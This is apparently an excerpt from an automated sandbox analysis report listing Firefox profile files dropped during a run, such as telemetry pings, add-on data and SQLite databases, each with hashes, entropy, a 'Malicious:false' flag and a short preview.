                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\Telemetry.FailedProfileLocks.txt

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:1

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 22422 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5308
                                                                                                                                                                                  Entropy (8bit):6.599374203470186
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:z2YbKsKNU2xWrp327tGmD4wBON6h6cHAHJVauvjZHjkTymdS1/qTMg6Uhm:zTx2x2t0FDJ4NpkuvjdeplTMohm
                                                                                                                                                                                  MD5:EB56C2F4DA9435F3D5574161F414CD17
                                                                                                                                                                                  SHA1:74A8FC3EC0559740FD9D835B638354985E2DEAB6
                                                                                                                                                                                  SHA-256:394E803D5FF8E156DFA7D15E96B51A683F4624A1BCF88EAA532399AC2C9B0966
                                                                                                                                                                                  SHA-512:DF90568D191C757392FB85BDDA5333C7FE7E3BB370C5DE8C50DD810B938D732E39B5608FB4494CAADAE99E1601989FDFC0FEBDCF70F27FFE581F904170A81E0F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..W....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 22422 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):5308
                                                                                                                                                                                  Entropy (8bit):6.599374203470186
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:z2YbKsKNU2xWrp327tGmD4wBON6h6cHAHJVauvjZHjkTymdS1/qTMg6Uhm:zTx2x2t0FDJ4NpkuvjdeplTMohm
                                                                                                                                                                                  MD5:EB56C2F4DA9435F3D5574161F414CD17
                                                                                                                                                                                  SHA1:74A8FC3EC0559740FD9D835B638354985E2DEAB6
                                                                                                                                                                                  SHA-256:394E803D5FF8E156DFA7D15E96B51A683F4624A1BCF88EAA532399AC2C9B0966
                                                                                                                                                                                  SHA-512:DF90568D191C757392FB85BDDA5333C7FE7E3BB370C5DE8C50DD810B938D732E39B5608FB4494CAADAE99E1601989FDFC0FEBDCF70F27FFE581F904170A81E0F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..W....{"app-system-defaults":{"addon....formautofill@mozilla.org&..Gdependencies":[],"enabled":true,"lastModifiedTime":1695865283000,"loader":null,"path":s.....xpi","recommendationStateA...rootURI":"jar:file:///C:/Program%20Files/M.......refox/browser/features/...... !/...unInSafeMode..wsignedD...telemetryKey..7%40R...:1.0.1","version":"..`},"pic..#in.....T.n..w...........S.......(.[......0....0"},"screenshots..T.r.....[.......(.V....-39.......},"webcompat-reporter...Ofals..&.z.....[.......(.]....=1.5.............<.)....p....d......1.z.!18...5.....startupData...pX.astentL..!er...webRequest%..onBefore...[[{"incognitoi.UtabId..!yp...."main_frame"],"url...."*://login.microsoftonline.com/*","..@us/*L.dwindows...},["blocking"]],...Iimag...https://smartT.".f.....etp/facebook.svg",...Aplay*....8`script...P.....-....-testbed.herokuapp\.`shims_..3.jsh.bexampl|.......Pexten{..Q../?..s...S.J/_2..@&_3U..s7.addthis . ic...officialK......-angularjs/current/dist(..t.min.js...track.adB...net/s

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                  Entropy (8bit):3.91829583405449
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                  MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                  SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                  SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                  SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"schema":6,"addons":[]}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.json.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                                  Entropy (8bit):3.91829583405449
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YWGifTJE6iHQ:YWGif9EE
                                                                                                                                                                                  MD5:3088F0272D29FAA42ED452C5E8120B08
                                                                                                                                                                                  SHA1:C72AA542EF60AFA3DF5DFE1F9FCC06C0B135BE23
                                                                                                                                                                                  SHA-256:D587CEC944023447DC91BC5F71E2291711BA5ADD337464837909A26F34BC5A06
                                                                                                                                                                                  SHA-512:B662414EDD6DEF8589304904263584847586ECCA0B0E6296FB3ADB2192D92FB48697C99BD27C4375D192150E3F99102702AF2391117FFF50A9763C74C193D798
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"schema":6,"addons":[]}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 9, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):229376
                                                                                                                                                                                  Entropy (8bit):0.826292767054668
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Sb1zkVmvQhyn+Zoz672NdZ60ubZIkA333JwMMUNlBN80/LKXVZGZjxmWt:SbpCMr1CRm
                                                                                                                                                                                  MD5:36A13021EDAA8A920D4656538972287D
                                                                                                                                                                                  SHA1:97D2E5C0A40FBD6EB6A6046331364BBF0F5AFCBD
                                                                                                                                                                                  SHA-256:186332EE39B7353B73E4AB3054FB4CC45D496254F54F3FE0209170188A3CB688
                                                                                                                                                                                  SHA-512:07C51DA717E7B722F1B863D1A48E05AEF776D290028D0BB4A5E0B5021389347AD4D09E9F14B8D0B74381DD0F710A52E706BCA697B9CD0351B84EDA9332812797
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):229944
                                                                                                                                                                                  Entropy (8bit):0.7381651550224085
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:7tWMjcA333JwMMUNlBN80/LKXQX1zkVmvQhyn+Zoz67K:QMr1CRGT
                                                                                                                                                                                  MD5:31177C581DDDAE0FA54D429A419EE110
                                                                                                                                                                                  SHA1:5DEEC02BCF23BB9BD0AE894DEE77FACD759D21C0
                                                                                                                                                                                  SHA-256:08D92F22AA8BA856357347CA25CA97E5826B9C0A90F14601607E7546503F8F04
                                                                                                                                                                                  SHA-512:6312F7B32566A5BDB5414E8D46F7B3F2DD520999080FDDB07ABAE2E75085F59E0B4FD1FA19FF3648374EE0E9F8AA6AA22F4C353EF7594B8FA69F102380734BF1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c.....q.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R..R.....k....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite-journal

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33288
                                                                                                                                                                                  Entropy (8bit):0.3089303537473895
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:7+tv6LCvwae+Q8Uu50xj0aWe9LxYkKA25Q52:7Mv6awae+QtMImelekKDa52
                                                                                                                                                                                  MD5:D515B02AA6D943DCA3EC456FF2A23237
                                                                                                                                                                                  SHA1:9651D372C8E1929C26B31BE02D9F9796E08A608C
                                                                                                                                                                                  SHA-256:DBC0ECE9F66BBA31412A74BD2D962772902545711B0B66F2D199D4D70C2B5EDE
                                                                                                                                                                                  SHA-512:275732DB73FA380FA71F959CF9850CCCA92BCD7F852324229EEA535271C4C1D23E721E754B2B64F5E7A89452A520A5DD000417884E23A60EA65FC7B199786A1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... .c.....T.;.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................j......|....~.}.}z}-|.............................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\store.json.mozlz4 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):66
                                                                                                                                                                                  Entropy (8bit):4.837595020998689
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                  MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                  SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                  SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                  SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\store.json.mozlz4.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 56 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):66
                                                                                                                                                                                  Entropy (8bit):4.837595020998689
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:3fX/xH8IXl/I3v0lb7iioW:vXpH1RPXt
                                                                                                                                                                                  MD5:A6338865EB252D0EF8FCF11FA9AF3F0D
                                                                                                                                                                                  SHA1:CECDD4C4DCAE10C2FFC8EB938121B6231DE48CD3
                                                                                                                                                                                  SHA-256:078648C042B9B08483CE246B7F01371072541A2E90D1BEB0C8009A6118CBD965
                                                                                                                                                                                  SHA-512:D950227AC83F4E8246D73F9F35C19E88CE65D0CA5F1EF8CCBB02ED6EFC66B1B7E683E2BA0200279D7CA4B49831FD8C3CEB0584265B10ACCFF2611EC1CA8C0C6C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40.8.....{"v":1,"crashes":{},"countsByDay....rruptDate":null}

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\aborted-session-ping (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):49357
                                                                                                                                                                                  Entropy (8bit):5.249999432032126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:R2o01Yc6v0BhgeTjjOugcvmjYpvZMd0ruo8Yhy8NEdhLRRsNhnzFSJ2fE:R2o0O1MBtKqvBppjypLRRsNhnzFSJR
                                                                                                                                                                                  MD5:1E4CAB5732D9CCC96DDBF426AADA5E93
                                                                                                                                                                                  SHA1:34DD5B11189C2554C34B523A8FDE995395D7D53D
                                                                                                                                                                                  SHA-256:E93D3B85E4464623EC8B3FABB2E3DD189574CD55E99C8182397C673CB48841BC
                                                                                                                                                                                  SHA-512:3F98A5AC9AE408D162FA630B9CE6F550DD55A8502EEEA1A6DD557E756CB78DDC4959B05502484B0A274EFE8EBB481262840BB20801DBF8CF082E8E1ABEB45646
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"type":"main","id":"3a665447-7735-4a9a-b5dc-d9e07c147418","creationDate":"2024-02-21T12:44:56.280Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"ver":4,"simpleMeasurements":{"totalTime":8961,"start":4432125,"main":4432795,"selectProfile":4432827,"afterProfileLocked":4432831,"startupCrashDetectionBegin":4436088,"firstPaint":4440619,"firstPaint2":4440001,"sessionRestoreInit":4437160,"sessionRestored":4440972,"createTopLevelWindow":4436386,"AMI_startup_begin":8866858,"XPI_startup_begin":8866865,"XPI_bootstrap_addons_begin":8866871,"XPI_bootstrap_addons_end":8867029,"XPI_startup_end":8867029,"AMI_startup_end":8867029,"XPI_finalUIStartup":8867861,"sessionRestoreInitialized":8867863,"delayedStartupStarted":8871325,"delayedStartupFinished":8871551,"startupInterrupted":0,"debuggerAttached":0,"s

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\aborted-session-ping.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):49357
                                                                                                                                                                                  Entropy (8bit):5.249999432032126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:R2o01Yc6v0BhgeTjjOugcvmjYpvZMd0ruo8Yhy8NEdhLRRsNhnzFSJ2fE:R2o0O1MBtKqvBppjypLRRsNhnzFSJR
                                                                                                                                                                                  MD5:1E4CAB5732D9CCC96DDBF426AADA5E93
                                                                                                                                                                                  SHA1:34DD5B11189C2554C34B523A8FDE995395D7D53D
                                                                                                                                                                                  SHA-256:E93D3B85E4464623EC8B3FABB2E3DD189574CD55E99C8182397C673CB48841BC
                                                                                                                                                                                  SHA-512:3F98A5AC9AE408D162FA630B9CE6F550DD55A8502EEEA1A6DD557E756CB78DDC4959B05502484B0A274EFE8EBB481262840BB20801DBF8CF082E8E1ABEB45646
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"type":"main","id":"3a665447-7735-4a9a-b5dc-d9e07c147418","creationDate":"2024-02-21T12:44:56.280Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"ver":4,"simpleMeasurements":{"totalTime":8961,"start":4432125,"main":4432795,"selectProfile":4432827,"afterProfileLocked":4432831,"startupCrashDetectionBegin":4436088,"firstPaint":4440619,"firstPaint2":4440001,"sessionRestoreInit":4437160,"sessionRestored":4440972,"createTopLevelWindow":4436386,"AMI_startup_begin":8866858,"XPI_startup_begin":8866865,"XPI_bootstrap_addons_begin":8866871,"XPI_bootstrap_addons_end":8867029,"XPI_startup_end":8867029,"AMI_startup_end":8867029,"XPI_finalUIStartup":8867861,"sessionRestoreInitialized":8867863,"delayedStartupStarted":8871325,"delayedStartupFinished":8871551,"startupInterrupted":0,"debuggerAttached":0,"s

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) g, rows 0, columns 1025
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7033
                                                                                                                                                                                  Entropy (8bit):4.391557009961953
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OSSF9nbkW6sSELty0oP/PbHpO7laQCUrdiEVA7:O9vnbosSE5JoPbJCQ
                                                                                                                                                                                  MD5:4B22C5050E4E24ED7D39F30AB2EFBA75
                                                                                                                                                                                  SHA1:3D67FBA1674493BAA2AFC376C2442740A7F91C7F
                                                                                                                                                                                  SHA-256:9DCA59E072160A1658E53BE7D32759474B4F2E403443DFD9E662641EF7AF73F1
                                                                                                                                                                                  SHA-512:56DC6CED8E7D9AC1DD1E1EB8480C4CAF907D58FBD6C399236FDD351CE62344DC5CB29473F64FEA069AB1FDFFEBF4B55793E7165416E8E3FDFC7F42BE0A2C1E07
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.................ping.....................app....:.......#.......baseline#legacy.telemetry.client_id9........0...........$.......7340e351-fad3-4a0f-b554-971fbfafe8fb!.......events#legacy.telemetry.client_id9........0...........$.......7340e351-fad3-4a0f-b554-971fbfafe8fb........events#urlbar.pref_max_results.............................*.......events#urlbar.pref_suggest_data_collection......................'.......events#urlbar.pref_suggest_nonsponsored......................$.......events#urlbar.pref_suggest_sponsored......................#.......events#urlbar.pref_suggest_topsites..............................glean_client_info#app_build#............................20230927232528........glean_client_info#app_channel.............................release%.......glean_client_info#app_display_version.............................118.0.1........glean_client_info#architecture.............................x86_64........glean_client_info#build_date2........)...................1970-01-01T00:00:00+

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) g, rows 0, columns 1025
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7033
                                                                                                                                                                                  Entropy (8bit):4.391557009961953
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:OSSF9nbkW6sSELty0oP/PbHpO7laQCUrdiEVA7:O9vnbosSE5JoPbJCQ
                                                                                                                                                                                  MD5:4B22C5050E4E24ED7D39F30AB2EFBA75
                                                                                                                                                                                  SHA1:3D67FBA1674493BAA2AFC376C2442740A7F91C7F
                                                                                                                                                                                  SHA-256:9DCA59E072160A1658E53BE7D32759474B4F2E403443DFD9E662641EF7AF73F1
                                                                                                                                                                                  SHA-512:56DC6CED8E7D9AC1DD1E1EB8480C4CAF907D58FBD6C399236FDD351CE62344DC5CB29473F64FEA069AB1FDFFEBF4B55793E7165416E8E3FDFC7F42BE0A2C1E07
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.................ping.....................app....:.......#.......baseline#legacy.telemetry.client_id9........0...........$.......7340e351-fad3-4a0f-b554-971fbfafe8fb!.......events#legacy.telemetry.client_id9........0...........$.......7340e351-fad3-4a0f-b554-971fbfafe8fb........events#urlbar.pref_max_results.............................*.......events#urlbar.pref_suggest_data_collection......................'.......events#urlbar.pref_suggest_nonsponsored......................$.......events#urlbar.pref_suggest_sponsored......................#.......events#urlbar.pref_suggest_topsites..............................glean_client_info#app_build#............................20230927232528........glean_client_info#app_channel.............................release%.......glean_client_info#app_display_version.............................118.0.1........glean_client_info#architecture.............................x86_64........glean_client_info#build_date2........)...................1970-01-01T00:00:00+

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1154
                                                                                                                                                                                  Entropy (8bit):4.616858941809899
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:YSTM/8oDQKtD7mpDltqVdHbDuytD7mpDuytD710:YOWpUKcxoLbbcbA
                                                                                                                                                                                  MD5:9495AB4DEDB3ECB1D4DA2F8E317ECF3D
                                                                                                                                                                                  SHA1:6DBCDE8D079CFB3A81F37810E94EF198D9CCF61C
                                                                                                                                                                                  SHA-256:6F83A79AA93F00473E8AC861AFE8F6CB394FC767AFF3541662B7553E5D03D16C
                                                                                                                                                                                  SHA-512:A911D52E097DCFBC647413DD235BA668C49936DB52B46DDD9BE2EC61275E3571A572CDD272163B1AFF7EF04239ADF5D5B69C26F3E202BF93FE141FB34583E36E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"timestamp":61915,"category":"nimbus_events","name":"enrollment","extra":{"experiment_type":"rollout","experiment":"extensions-migration-in-import-wizard-116-rollout","enrollment_id":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","branch":"control"}}.{"timestamp":64059,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timestamp":64060,"category":"nimbus_events","name":"validation_failed","extra":{"experiment":"next-generation-accessibility-user-powering-screen-readers-and-other-ats-copy","reason":"invalid-feature","feature":"accessibilityCache"}}.{"timestamp":91996,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timestamp":91996,"category":"nimbus_events","name":"validation_failed","extra":{"

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1228
                                                                                                                                                                                  Entropy (8bit):4.622002125502566
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:YSgDTM/8oDQKtD7mpDltqVdHbDuytD7mpDuytD710:Yj3WpUKcxoLbbcbA
                                                                                                                                                                                  MD5:39D2FEDDF57C1D5E789BB06A29A45B44
                                                                                                                                                                                  SHA1:949662CCC8DD30B13D01DD31C5167B98C6556EEB
                                                                                                                                                                                  SHA-256:F22F2C1A54BF85CD79A17613E7A22337F5FE2D2B64F779C9EA7A32A87A47604A
                                                                                                                                                                                  SHA-512:E6F97C9EC7DC235F2F58C18B4204BC6BCB1E452C30767DD3329F9E50DB1B8FCD3FEDBDD38F64514443D9D5D1CD1C3FBC42563B588CF80FD71E5AADCC9713C84E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"timestamp":0,"category":"fog.validation","name":"validate_early_event"}.{"timestamp":61915,"category":"nimbus_events","name":"enrollment","extra":{"experiment_type":"rollout","experiment":"extensions-migration-in-import-wizard-116-rollout","enrollment_id":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","branch":"control"}}.{"timestamp":64059,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timestamp":64060,"category":"nimbus_events","name":"validation_failed","extra":{"experiment":"next-generation-accessibility-user-powering-screen-readers-and-other-ats-copy","reason":"invalid-feature","feature":"accessibilityCache"}}.{"timestamp":91996,"category":"nimbus_events","name":"validation_failed","extra":{"feature":"accessibilityCache","experiment":"next-generation-accessibility-user-powering-screen-readers","reason":"invalid-feature"}}.{"timesta

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\0662ae79-7d3e-4596-a16d-d1cef2261f61 (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (10690)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10761
                                                                                                                                                                                  Entropy (8bit):4.715630945657858
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:E4SfP+PCJDFujzXJzT9TA4xGBqhsRnjJxrf1Jps3Cm8M6IHc8Dofa5C8f+zHB9Q:x3abuuNqV+1+
                                                                                                                                                                                  MD5:20C8C5835D2706880EA3052F875F12EB
                                                                                                                                                                                  SHA1:BF7D0A6FF95907DA12300E42BDAA36E9F7D6052B
                                                                                                                                                                                  SHA-256:30D0FE6C4CED94AF1E11468147F874513DC30EFA5400706FF98FD27C42477CB5
